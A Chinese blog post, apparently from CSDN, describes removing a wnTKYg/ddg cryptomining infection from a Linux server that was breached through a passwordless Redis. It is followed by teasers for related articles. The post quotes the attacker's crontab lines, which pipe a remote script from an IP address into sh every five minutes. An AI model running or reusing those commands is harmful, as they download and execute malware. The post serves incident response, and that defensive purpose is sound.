服务器被挂马wnTKYg挖矿的清理

最新推荐文章于 2021-05-12 16:49:32 发布
最新推荐文章于 2021-05-12 16:49:32 发布
阅读量339 收藏
点赞数
分类专栏: 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sunxiaofeng_sdn/article/details/80281310
版权

locate wnTKYg命令一上屏,遂将这个程序位置暴露出来,竟然在/tmp下。百度查了查据说这个是redis允许远程连接并且没设密码的关系,正好符合我们新项目测试的环境,赶紧打开/etc/redis.conf文件 把bind 127.0.0.1的注释del掉了,重启redis。测试从外部机器上登录redis已经登不上了。
接下来改着手干掉这个进程了,二话不说直接kill -9掉这个进程,cd到/tmp下 把这个文件打个包,传到本地电脑上,有时间研究研究。tar打包并传输完成再次top的时候发现这个进程又复活了,首先想到的是crond里面有计划任务,打开crontab -e查看没什么异常。

处理方法和建议:

 

  • 1.根据这个提示,发现/tmp下还有个ddg.2021文件,这个文件在进程里面也确实存在,直接kill -9 ddg.2021进程和wnTKYg进程的pid。
  • 2.然后删除/tmp下的ddg.2021和wnTKYg文件,发现还有个imWBR1文件也一并删除了。/tmp下的带执行权限的文件总会引起怀疑。
  • 3.把/tmp文件夹的执行权限去掉,改成644。
  • 4,ls /var/spool/ 进去cron里面看了一下,有个叫root的脚本,内容如下:
 

 

       */5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh 
 

       */5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
 


    直接删除这cron文件夹,OK了
 

  • 5.更改redis只能本地登录,设置redis认证密码。
  • 6.关闭挖矿服务器访问:
 

 

  iptables -A INPUT -s xmr.crypto-pool.fr -j DROP 
 

 iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
 


再次ps aux |grep wnTKYg 和 ps aux |grep |ddg.2021的时候没有发现这俩进程。
保险起见ps aux |grep imWBR1 这个是刚刚删除的tmp文件夹下有执行权限的文件,也并没有该进程,仔细检查top之后,发现恢复正常。
 

总结:
 


这种挂马钻的空子总是新项目测试项目的redis没有安全防护,用的默认配置,免密远程登录。大家多多注意安全,做好防护。安全生产最重要!

                

        

    

  



    



                



	

		

			

				
					
记一次服务器清除挖矿木马操作记录

				
			

			

				

					skyfans的博客
				

				

					12-24
					
					2129
					
				

			

		

		

			
				
突然接到服务器告警,一台服务器的CPU已经达到了3000%,不用想,肯定是中了木马了,这完全论为了矿机了。问了一堆公司的安全砖家,都说没的救了,需要重新做系统了,但是和开发对接了下,这台服务器上存在众多重要的程序内容,无法直接重装操作系统。。。

这特么不是围栏老子呢吗?

好吧,抱着试一试的态度,我们来试一哈解决处理下吧。
1.查看现象
top

可以看到,一个进程2N6f1P,狠占CPU,占到...

			
		

	



                

            
              



	

		

			

				
					
服务器挖矿木马劫持事件

				
			

			

				

					u014442879的博客
				

				

					08-17
					
					406
					
				

			

		

		

			
				
事件回顾
2020年8月10日中午12时30分接到阿里云发出的服务器挖矿木马入侵的警告,之后个系统出现不能访问的情况,登录阿里云控制面板查看,kubernetes集群的四台节点服务器CPU使用率都处在高位(100%),之后迅速展开排查,查杀木马程序进程,删除木马程序执行文件,关闭木马程序容器,删除木马程序的镜像,于13点15分,四个节点服务器上木马程序清理完毕,服务器CPU使用率恢复正常,系统访问正常。
处理方式
1.根据阿里云报警信息,删除服务器上木马程序。
2.“top”命令查看服务器占用资源最高的进

			
		

	



              


  
              

                


	

		

			

				
					
挖矿进程wnTKYg解决方案

				
			

			

				

					weixin_34403693的博客
				

				

					11-12
					
					170
					
				

			

		

		

			
				
  阿里云推送了一段短信:您的服务器出现了入侵事件:挖矿进程。赶紧top一下
  
  CPU占用率99%,好气哦
  pkill wnTKYg 先杀死再说
  几秒后又出现了,肯定有自动执行脚本
  crontab -l 果然有两个(此处没有截图),立马删掉 /var/spool/cron/ 下的所有文件,
  还是出现了wnTKYg,重复几次以上的操作,发现。。。麻辣鸡,ddg.1...

			
		

	





	

		

			

				
					
wnTKYg长期占用CPU资源(linux)

				
			

			

				

					baidu_36720706的博客
				

				

					03-19
					
					293
					
				

			

		

		

			
				
第一步:堵住木马入侵的源头由于一开始使用redis并没有设置密码,导致wnTKYg被植入。修补该漏洞的方法(在redis.conf中设置):①.修改默认端口# Accept connections on the specified port, default is 6379 (IANA #815344).
# If port 0 is specified Redis will not listen...

			
		

	



		

			
		



	

		

			

				
					
近期 wnTKYg Linux 恶意软件简介

				
			

			

				

					坚持
				

				

					11-24
					
					525
					
				

			

		

		

			
				
source : ddg.2020

1.下载配置数据库,用来攻击其他电脑;
2.从配置中获取http服务器,下载i.sh的脚本,
3.将将脚本插入到系统的cron中,定时执行;
4.执行脚本,将挖矿程序下载到本地,开始挖矿;

自身从几个域名中获取站点( copy from my file: /etc/hosts ), 
127.0.0.1  ident.me
127.0.0.

			
		

	





	

		

			

				
					
记一次Centos服务器挂马的抓马经历

				
			

			

				

					09-15
				

			

		

		

			
				
主要介绍了记一次Centos服务器挂马的抓马经历分享,非常不错,具有参考借鉴价值,需要的朋友参考下

			
		

	





	

		

			

				
					
护卫神·网页挂马清理工具 v1.0

				
			

			

				

					03-09
				

			

		

		

			
				
护卫神·网页挂马清理工具是一款完全免费的专业清理网页挂马代码的绿色实用小工具,主要是针对网页被频繁挂马的情况而研发的小软件,可以帮助您从海量文件中迅速定位挂马代码并清除,减少您的工作量。 Tags: 挂马...

			
		

	





	

		

			

				
					
讲解SQL Server数据库被挂马的解决方案

				
			

			

				

					08-04
				

			

		

		

			
				
一个网站遭遇入侵,破坏相当严重,SQL数据库被挂马,所有的表里面大部分字段都被多次重复插入挂马代码,查看日志,还好没有涉及到服务器的安全,只是数据库那里出现了很多异常警告而已,网站确实存在漏洞。...

			
		

	





	

		

			

				
					
网页挂马清理

				
			

			

				

					10-25
				

			

		

		

			
				
网页挂马清理是网络安全领域中的一个重要话题,主要指的是检测并清除网页中隐藏的恶意代码,这些代码通常由黑客植入,用于在用户访问受感染的网页时悄悄地在用户的计算机上安装恶意软件。"木马守护神 罩页挂马清理...

			
		

	





	

		

			

				
					
通信与网络中的讲解SQL Server数据库被挂马的解决方案

				
			

			

				

					11-18
				

			

		

		

			
				
一个网站遭遇入侵,破坏相当严重,SQL数据库被挂马,所有的表里面大部分字段都被多次重复插入挂马代码,查看日志,还好没有涉及到服务器的安全,只是数据库那里出现了很多异常警告而已,网站确实存在漏洞  ...

			
		

	





	

		

			

				
					
minerd和wnTKYg进程(病毒)--被攻击CPU占用率达到100%

				
			

			

				

					sylalak123的博客
				

				

					01-08
					
					541
					
				

			

		

		

			
				

今天登录服务器感觉服务器特别的慢。结果查看发现有两个进程占用CPU100%了,一个是minerd一个是wnTKYg。如果大家遇到请小心。


查看服务器各个程序占用资源量

[root@iZ2zeayj54m6qs0689jm ~]# top
  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND         ...

			
		

	





	

		

			

				
					
阿里云CentOS7.2清除wnTKYg木马

				
			

			

				

					木头若愚
				

				

					11-07
					
					1905
					
				

			

		

		

			
				
最近发现阿里云CPU占用很高,一直是100%,重启之后降下来了,但过一会又100%。


用top命令查了一下,发现是wnTKYG进程占用了99.9%,百度了一下wnTKYG说是一个挖矿木马,中毒原因应该是redis没有设密码或者是弱口令。
先关了redis防止再次中招
systemctl stop redis_6379
接下来
如果/root/.ssh/下有异常文件或记录:rm -

			
		

	





	

		

			

				
					
wnTKYg木马的解决

				
			

			

				

					qq877192055的博客
				

				

					09-29
					
					521
					
				

			

		

		

			
				
tomcat 无缘无故卡死,查询cpu发现cpu一直很高
top命令,发现异常进程wnTKYg

1.cd /tmp
删除所有ddg开头的文件和wnTKYg文件
2.kill掉ddg开头的进程和wnTKYg进程
3.、/var/spool/cron 下面删除文件
再监控10分钟,发现cpu正常了

			
		

	





	

		

			

				
					
Redis 阿里云服务器遭遇攻击

				
			

			

				

					mrathena
				

				

					11-20
					
					1888
					
				

			

		

		

			
				
博文目录
文章目录攻击提醒查看异常638063796381补救操作系统操作Redis添加密码认证残留问题

攻击提醒

通过描述来看, 我的服务器挂马, 一直在尝试攻击别人服务器的6379端口, 阿里云一定时限内禁止我访问其他服务器的6379端口
我估计是因为我的Redis使用了默认的6379端口, 且没有设置密码, 且开放了一堆端口到公网, 且使用的是root账户, 被人扫到了, 然后通过漏洞做了不好的事情, 我是Linux小白, 只能百度看看有什么查漏补缺的措施了
查看异常
执行top发现有两个进程占

			
		

	





	

		

			

				
					
linux感染十字符病毒,十字符病毒,杀不死的小强,一次云服务器沦陷实录

				
			

			

				

					weixin_36221923的博客
				

				

					05-12
					
					360
					
				

			

		

		

			
				
一、现象接到客户的电话,说自己的云服务器被提供商禁止访问了,原因是监测到网络流量暴满,服务器不停的向外发包,在确认客户没有业务量突增的情况下,初步判断可能服务器遭受了流量攻&击(DDOS),不过按照常理来说,客户的业务系统就是一个小的web系统,平时流量不大,影响力也一般,不至于遭受DDOs,带着这些疑问,要到了客户服务器的登录方式,废话少说,还是进入系统,一查究竟吧。二、排查问题下图是登...

			
		

	





	

		

			

				
					
CentOS7清除wnTKYg木马

				
			

			

				

					紫眸的博客
				

				

					06-11
					
					6741
					
				

			

		

		

			
				
今天偶然发现服务器cpu占用率一直是100%,top查看了发现是一个名为wnTKYg的进程。
网上查找说是一个挖矿木马,清理之后做个记录。
木马如下图:


尝试pkill -9 wnTKYg杀死进程,发现没过多久又出现了
感觉好恶心,中毒原因应该是redis没有设密码或者是弱口令,先关了redis防止再次中招
systemctl stop redis
接下来
如果/root/.

			
		

	





	

		

			

				
					
Java调用Jenkins API获取任务构建归档文件

				
			

			

				

					建伟博客
				

				

					03-14
					
					4636
					
				

			

		

		

			
				
Centos  清除wnTKYg 删除挖矿病毒 redis漏洞

			
		

	





	

		

			

				
					
记一次站点被挂马问题排查

				
			

			

				

					weixin_33935777的博客
				

				

					10-26
					
					365
					
				

			

		

		

			
				
起因,在下班准备回家之际,收到几条朋友发来的信息,说他的网站在百度搜索做信息流广告推广,但是从百度搜索点击打开就会跳转的×××,让我帮忙排查下问题,是不是被挂马了,于是乎就开始了后面的故事


为了保护网站隐私,假定网站地址是:http://www.xxx.com

收到消息后我尝试操作并收集到下面现象内容:
现象1:通过域名直接打开网站,可以正常打开,不会跳转到×××站    现象2:通过百度...

			
		

	





	

		

			

				
					
linux服务器被植入木马挖矿程序的解决过程记录。

				
			

			

				

					weixin_38067745的博客
				

				

					12-24
					
					4971
					
				

			

		

		

			
				
今天我的网站突然无法访问,我马上进入服务器排查情况。用top命令查看进程,发现有某个进程的cpu使用率到达90%以上,而这个进程并不是我启动的。我怀疑这个进程是个木马程序,于是我用kill -9 【进程id】把该进程杀掉。发现没过多久该进程又启动了。我反复试了几次还是不行,于是更加断定我的怀疑了。



  经过老大的提醒,有可能是redis的漏洞导致被攻击,我马上...

			
		

	





	

		

			

				
					
网站挂马防范:批量清除工具使用指南

				
			

			

				

					
				

			

		

		

			
				
网站被挂马是一种常见的网络安全威胁,通常指的是攻击者通过各种手段在网站的文件中植入恶意代码,如木马病毒、后门程序等,以达到窃取网站数据、控制网站服务器、传播恶意软件等非法目的。当网站被挂马后,访问者在...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值